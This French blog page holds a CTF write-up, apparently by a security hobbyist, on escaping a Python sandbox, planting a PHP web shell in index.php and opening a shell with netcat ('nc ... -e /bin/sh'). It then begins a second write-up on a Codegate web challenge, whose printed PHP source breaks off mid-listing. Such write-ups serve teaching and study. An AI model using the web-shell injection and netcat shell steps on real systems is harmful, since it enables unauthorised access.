<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL5vy31oOJiUm93qKf-aJeVu3NaddGw9_pdmulYfD6SBcRDW7tmzxFYNr-YEC4_7tAfPp1Ma7yOpv2tsxeTly8iZyhfxMnm7bkgJh07qlnxBjDEGFAj409G225bW59ZyJz2LW0Jae_tIF0/s1600/escape_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL5vy31oOJiUm93qKf-aJeVu3NaddGw9_pdmulYfD6SBcRDW7tmzxFYNr-YEC4_7tAfPp1Ma7yOpv2tsxeTly8iZyhfxMnm7bkgJh07qlnxBjDEGFAj409G225bW59ZyJz2LW0Jae_tIF0/s1600/escape_1.png" height="201" width="640" /></a></div>
<br />
<br />
Bon, ici que voyons-nous concrètement?<br />
Et bien pas mal de choses intéressantes comme surtout l'appel aux sous-classes qui est possible (pourquoi ne le serait-il pas??) et bien sûr le builtin <span style="color: blue;">dir() </span>qui nous retourne une liste complète des attributs disponibles!<br />
<br />
Dans ce cas cherchons donc si quelque chose existe et se trouve disponible pour arriver à sortir de cette sandbox et aller lire notre fichier comme nous le ferions avec le builtin<span style="color: blue;"> file()</span> (ne pas confondre avec <span style="color: blue;">__file__</span>).<br />
<br />
Oui mais alors comment faire? Simple! Allons <a href="https://docs.python.org/2/library/stdtypes.html#special-attributes" target="_blank">ici</a> lire la doc Python afin d'avoir quelques précisions et idées !<br />
<br />
L'attribut "bases" peux nous aider, en effet, ce dernier retourne les classes de base d'un objet de classe (sous classe), testons et creusons:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf84rirPIjI91jtiOK5aIl7HMz4oXgOoMmT_qx5U3O0L7Dyd0Pee79at59iVWORK6qdgN7tuwUj9lIrvM6S_ZNaTzQX4OHCXaX6wx5x5HXn1PkuRe2-_36xyr8n3M_6_jBGUPGqnTjDJNp/s1600/escape_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf84rirPIjI91jtiOK5aIl7HMz4oXgOoMmT_qx5U3O0L7Dyd0Pee79at59iVWORK6qdgN7tuwUj9lIrvM6S_ZNaTzQX4OHCXaX6wx5x5HXn1PkuRe2-_36xyr8n3M_6_jBGUPGqnTjDJNp/s1600/escape_2.png" height="132" width="640" /></a></div>
<br />
<div style="text-align: center;">
<b>WOOT!!</b></div>
<br />
Bon la je sais pas vous mais moi en voyant ça j'me dis que la sortie est proche réfléchissons et surtout continuons avec, en premier lieu, des tests en local sur l'interpréteur Python d'autant que nous voyons dans cette magnifique liste un certain "type file<span style="color: blue;"><type file=""></type></span>" et ça mes amis ça vaut de l'or !<br />
<br />
L'idée sera alors de tester cette classe en utilisant son index.<br />
Afin donc de ne pas le compter à la mano, utilisons bêtement une petite boucle et le tour sera alors joué:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie45-pYQYDhGboMfws_o-uqCnv2v7RXpLIUekhTx3UiB35bdWI6gk_MoSfViW_vC0nTfhTms9_lusqX_VD6i0q02UvdmOAoUndFZ9pzCBzb2F-FC_quchqv1Q9e2jCcd7iv0JTH4dmYMHq/s1600/escape_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie45-pYQYDhGboMfws_o-uqCnv2v7RXpLIUekhTx3UiB35bdWI6gk_MoSfViW_vC0nTfhTms9_lusqX_VD6i0q02UvdmOAoUndFZ9pzCBzb2F-FC_quchqv1Q9e2jCcd7iv0JTH4dmYMHq/s1600/escape_3.png" height="288" width="640" /></a></div>
<br />
Ok... à présent nous avons: la classe et son index donc testons notre idée en local et si cette dernière fonctionne, sur notre sandbox afin d'aller jouer hors du bac à sable:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxlgLk0FyybaoFRjjBur6AoF8Sigr_WU-ot64FmJmEn_3UfT6G4iglRzZRmV7ABzz6bsi1_xLPhsEBG3gnJubslHzSRAQ0uKtfsmz_N0pNAXTvQa67OHgK2g72i2beKLUUqMoNAuu491mu/s1600/escape_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxlgLk0FyybaoFRjjBur6AoF8Sigr_WU-ot64FmJmEn_3UfT6G4iglRzZRmV7ABzz6bsi1_xLPhsEBG3gnJubslHzSRAQ0uKtfsmz_N0pNAXTvQa67OHgK2g72i2beKLUUqMoNAuu491mu/s1600/escape_4.png" height="45" width="400" /></a></div>
<br />
<br />
Et bien, qu'est-ce que je disais!?<br />
La sortie semble toute proche et l'heure de vérité a sonné: libérons nous de nos chaînes !!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyrp8Pc4xosryqBi_PHNyaR4dLHtoCtWdwxAxAy6ssfPifHR9UBcnzDnHpIushoX5LFWyjb7OlZzA8z5zHIjqKhTacwdDKhZklLoBk67TqwLqh8iV7cVrKPs6Bi4UQa6hJFiYSl2F8Qthf/s1600/escape_final.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyrp8Pc4xosryqBi_PHNyaR4dLHtoCtWdwxAxAy6ssfPifHR9UBcnzDnHpIushoX5LFWyjb7OlZzA8z5zHIjqKhTacwdDKhZklLoBk67TqwLqh8iV7cVrKPs6Bi4UQa6hJFiYSl2F8Qthf/s1600/escape_final.png" height="358" width="640" /></a></div>
<br />
<div style="text-align: center;">
<b><u><span style="color: red;">Pour aller plus loin</span></u></b></div>
<br />
<br />
A partir d'ici nous ne sommes plus gêné et sortons de la sandbox alors il serait temps de, par exemple, s'octroyer un petit shell qu'en dites vous ?<br />
<br />
(on peux aussi modifier des configurations réseau ou autre, cela dépendra de votre imagination, de vos compétences, de vos objectifs mais surtout des permissions)<br />
<br />
J'illustrerais cela avec la compromission du système via son site web avec obtention d'un web shell puis d'un reverse shell via <b>NC</b> (si un <b>IPTABLES</b> était présent j'aurais tout aussi bien pût mettre en pratique mon firewall bypassing et maintenir un accès furtif persistant via l'option <span style="color: blue;">-9</span> ou <span style="color: blue;">--listen-signature</span> sous <b>HPING3</b>).<br />
<br />
Ici mon idée sera simple: injecter du code php dans la page d'index <span style="color: blue;">index.php</span> avec un paramètre passé en <span style="color: purple;"><b>GET</b></span> puis transmis à <span style="color: blue;">system()</span> pour obtenir mon web shell:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaiJrOuj1DEiOFtAEezozE9uqAcd5U-tofxtbOzq47HuN8Pe4MdpfSDpVRdAzNBPEiZb3AJv_MWEAtk05koNxQPLzYJyD8wFMwvdnfPgCYowwXGePlYj1gQxdHlpDa5DWWYbgDphHhdeks/s1600/espaces.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaiJrOuj1DEiOFtAEezozE9uqAcd5U-tofxtbOzq47HuN8Pe4MdpfSDpVRdAzNBPEiZb3AJv_MWEAtk05koNxQPLzYJyD8wFMwvdnfPgCYowwXGePlYj1gQxdHlpDa5DWWYbgDphHhdeks/s1600/espaces.png" height="65" width="400" /></a></div>
<br />
<br />
Bon il est évident que nous avons un léger soucis avec les espaces, qu'à cela ne tienne, utilisons autre chose:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj128JEmRFThuubHhLL33dNbO-4F8C8TCEZ7UAWGg5fMgZwpXjTw2ghOx0adu4br3zU5MZOucvnfOMDuzyLJnfgd6tqudfqXAGzu9pDIJKaGMymeVB06NNPgXa-XAm2sKauGwz64-EGm_Bc/s1600/sans_espaces.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj128JEmRFThuubHhLL33dNbO-4F8C8TCEZ7UAWGg5fMgZwpXjTw2ghOx0adu4br3zU5MZOucvnfOMDuzyLJnfgd6tqudfqXAGzu9pDIJKaGMymeVB06NNPgXa-XAm2sKauGwz64-EGm_Bc/s1600/sans_espaces.png" height="111" width="400" /></a></div>
<br />
<br />
Okay il semble que cette fois-ci notre code malicieux ait bien été injecté dans la page souhaitée testons et par la même voyons si notre reverse shell peux être mis en place!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3lGECEwAqn5b6Gp-tOUnQo23150m4ydK-GmM7BlpEbc1XohnFErqQtTQKILOQ_e4S8WIGz-qyapap01nk99w6RY0IsakIil2uWjx89dUGY6-_wQ_nlGL7s4XeO4HRaJDEJEjpKEIR9436/s1600/webshell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3lGECEwAqn5b6Gp-tOUnQo23150m4ydK-GmM7BlpEbc1XohnFErqQtTQKILOQ_e4S8WIGz-qyapap01nk99w6RY0IsakIil2uWjx89dUGY6-_wQ_nlGL7s4XeO4HRaJDEJEjpKEIR9436/s1600/webshell.png" height="171" width="640" /></a></div>
<br />
<div>
Magnifique!!</div>
<div>
A présent voyons si notre <span style="color: blue;">nc -nvv -l -p 31337 -e /bin/sh </span>fonctionne:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjE4e4r2WbuBGuxpn3VVFJGKRZUAZ79kQWdHHvBu3EpJPIUX7zwo-aKxoXZAfCxEUILOOsnAbmPjhjLy-n_FSq1wpzk4CHW22r4K3utZVNDe4yJ6wjL0FwH7hwq7rFBIaIMdqJs26QpDhTD/s1600/reverse_shell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjE4e4r2WbuBGuxpn3VVFJGKRZUAZ79kQWdHHvBu3EpJPIUX7zwo-aKxoXZAfCxEUILOOsnAbmPjhjLy-n_FSq1wpzk4CHW22r4K3utZVNDe4yJ6wjL0FwH7hwq7rFBIaIMdqJs26QpDhTD/s1600/reverse_shell.png" height="90" width="640" /></a></div>
<div>
<br /></div>
Et voilà !! Mission accomplie avec succès: "from sandbox to reverse shell" , bien sûr tout cela peut encore être amélioré (FW bypass, priv-esc ..) mais ce n'est pas le sujet ici.<br />
<br />
Vous avez donc bien plus ici qu'un simple write-up tel qu'on en trouve concernant ce type de challenge sur le net avec, je l'espère, une meilleure visibilité sur l'impact que peux avoir une évasion de sandbox mais aussi comment concrètement cela se passe!<br />
Nos seules limites? Nos compétences et notre imagination...comme toujours...<br />
<br />
Liens utiles et qui m'ont énormément appris:<br />
<a href="http://zolmeister.com/2013/05/escaping-python-sandbox.html">http://zolmeister.com/2013/05/escaping-python-sandbox.html</a><br />
<a href="https://isisblogs.poly.edu/2012/10/26/escaping-python-sandboxes/">https://isisblogs.poly.edu/2012/10/26/escaping-python-sandboxes/</a><br />
<a href="http://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html">http://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html</a><br />
<br />
A bientôt pour de nouvelles aventures et ... sortez couvert !! :Dkmkzhttp://www.blogger.com/profile/11354372095868320290noreply@blogger.com2tag:blogger.com,1999:blog-4457623080129847893.post-13589559797383657242014-02-24T19:56:00.000+01:002014-02-24T19:56:14.440+01:00[Write Up] 120 (Codegate web 500)Salut !<br />
Alors oui, le week end dernier avait lieu les quals pour le codegate et comme chaque années nos amis Coréens nous ont réalisé un festival de challs avec un level plutôt appréciable loiiiiin du monde de l'entreprise ET C'EST TANT MIEUX!! :p<br />
<br />
Ainsi je me lance dans le write up d'un challenge web super simpa et trés technique qui m'a beaucoup plus: <b>120, le web 500!</b><br />
<b><br /></b>
1-<u>Présentation</u>:<b> </b><br />
Le challenge vous donnait un link<b> http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/index.php</b> sur lequel se trouvait juste un champ password et un joli texte indiquant "<b>Time Left 120</b>".<br />
<br />
Vous aurez bien compris que le password n'étant pas fourni ... no comment.<br />
A coté de ça, une fois n'est pas coutume nous avions accès au code source et honnêtement tant mieux ! lol<br />
<div style="text-align: center;">
(je vous paste ça sur pastebin avec un lien <a href="http://pastebin.com/A4vmrpZv" target="_blank">ici</a> au cas ou..)</div>
<div style="text-align: center;">
<br /></div>
<ol style="background-color: #f8f8f8; color: #acacac; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px; margin: 0px; padding: 0px 0px 0px 48px;">
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw2" style="font-weight: bold;"></span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw3" style="color: #990000;">session_start</span><span class="br0" style="color: #009900;">(</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: #000088;">$link</span> <span class="sy0" style="color: #339933;">=</span> <span class="sy0" style="color: #339933;">@</span><span class="kw3" style="color: #990000;">mysql_connect</span><span class="br0" style="color: #009900;">(</span><span class="st_h" style="color: blue;">'localhost'</span><span class="sy0" style="color: #339933;">,</span> <span class="st_h" style="color: blue;">''</span><span class="sy0" style="color: #339933;">,</span> <span class="st_h" style="color: blue;">''</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="sy0" style="color: #339933;">@</span><span class="kw3" style="color: #990000;">mysql_select_db</span><span class="br0" style="color: #009900;">(</span><span class="st_h" style="color: blue;">''</span><span class="sy0" style="color: #339933;">,</span> <span class="re0" style="color: #000088;">$link</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw2" style="font-weight: bold;">function</span> RandomString<span class="br0" style="color: #009900;">(</span><span class="br0" style="color: #009900;">)</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;">{</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: #000088;">$filename</span> <span class="sy0" style="color: #339933;">=</span> <span class="st0" style="color: blue;">"smash.txt"</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: #000088;">$f</span> <span class="sy0" style="color: #339933;">=</span> <span class="kw3" style="color: #990000;">fopen</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: #000088;">$filename</span><span class="sy0" style="color: #339933;">,</span> <span class="st0" style="color: blue;">"r"</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: #000088;">$len</span> <span class="sy0" style="color: #339933;">=</span> <span class="kw3" style="color: #990000;">filesize</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: #000088;">$filename</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: #000088;">$contents</span> <span class="sy0" style="color: #339933;">=</span> <span class="kw3" style="color: #990000;">fread</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: #000088;">$f</span><span class="sy0" style="color: #339933;">,</span> <span class="re0" style="color: #000088;">$len</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: #000088;">$randstring</span> <span class="sy0" style="color: #339933;">=</span> <span class="st_h" style="color: blue;">''</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">while</span><span class="br0" style="color: #009900;">(</span> <span class="kw3" style="color: #990000;">strlen</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: #000088;">$randstring</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;"><</span><span class="nu0" style="color: #cc66cc;">30</span> <span class="br0" style="color: #009900;">)</span><span class="br0" style="color: #009900;">{</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: #000088;">$t</span> <span class="sy0" style="color: #339933;">=</span> <span class="re0" style="color: #000088;">$contents</span><span class="br0" style="color: #009900;">[</span><span class="kw3" style="color: #990000;">rand</span><span class="br0" style="color: #009900;">(</span><span class="nu0" style="color: #cc66cc;">0</span><span class="sy0" style="color: #339933;">,</span> <span class="re0" style="color: #000088;">$len</span><span class="sy0" style="color: #339933;">-</span><span class="nu0" style="color: #cc66cc;">1</span><span class="br0" style="color: #009900;">)</span><span class="br0" style="color: #009900;">]</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">if</span><span class="br0" style="color: #009900;">(</span><span class="kw3" style="color: #990000;">ctype_lower</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: #000088;">$t</span><span class="br0" style="color: #009900;">)</span><span class="br0" style="color: #009900;">)</span><span class="br0" style="color: #009900;">{</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: #000088;">$randstring</span> <span class="sy0" style="color: #339933;">.=</span> <span class="re0" style="color: #000088;">$t</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;">}</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;">}</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">return</span> <span class="re0" style="color: #000088;">$randstring</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;">}</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: #000088;">$max_times</span> <span class="sy0" style="color: #339933;">=</span> <span class="nu0" style="color: #cc66cc;">120</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">if</span> <span class="br0" style="color: #009900;">(</span><span class="re0" style="color: #000088;">$_SESSION</span><span class="br0" style="color: #009900;">[</span><span class="st_h" style="color: blue;">'cnt'</span><span class="br0" style="color: #009900;">]</span> <span class="sy0" style="color: #339933;">></span> <span class="re0" style="color: #000088;">$max_times</span><span class="br0" style="color: #009900;">)</span><span class="br0" style="color: #009900;">{</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw3" style="color: #990000;">unset</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: #000088;">$_SESSION</span><span class="br0" style="color: #009900;">[</span><span class="st_h" style="color: blue;">'cnt'</span><span class="br0" style="color: #009900;">]</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;">}</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">if</span> <span class="br0" style="color: #009900;">(</span> <span class="sy0" style="color: #339933;">!</span><span class="kw3" style="color: #990000;">isset</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: #000088;">$_SESSION</span><span class="br0" style="color: #009900;">[</span><span class="st_h" style="color: blue;">'cnt'</span><span class="br0" style="color: #009900;">]</span><span class="br0" style="color: #009900;">)</span><span class="br0" style="color: #009900;">)</span><span class="br0" style="color: #009900;">{</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: #000088;">$_SESSION</span><span class="br0" style="color: #009900;">[</span><span class="st_h" style="color: blue;">'cnt'</span><span class="br0" style="color: #009900;">]</span><span class="sy0" style="color: #339933;">=</span><span class="nu0" style="color: #cc66cc;">0</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: #000088;">$_SESSION</span><span class="br0" style="color: #009900;">[</span><span class="st_h" style="color: blue;">'password'</span><span class="br0" style="color: #009900;">]</span><span class="sy0" style="color: #339933;">=</span>RandomString<span class="br0" style="color: #009900;">(</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: #000088;">$query</span> <span class="sy0" style="color: #339933;">=</span> <span class="st0" style="color: blue;">"delete from rms_120_pw where ip='<span class="es4" style="color: #006699; font-weight: bold;">$_SERVER[REMOTE_ADDR]</span>'"</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="sy0" style="color: #339933;">@</span><span class="kw3" style="color: #990000;">mysql_query</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: #000088;">$query</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
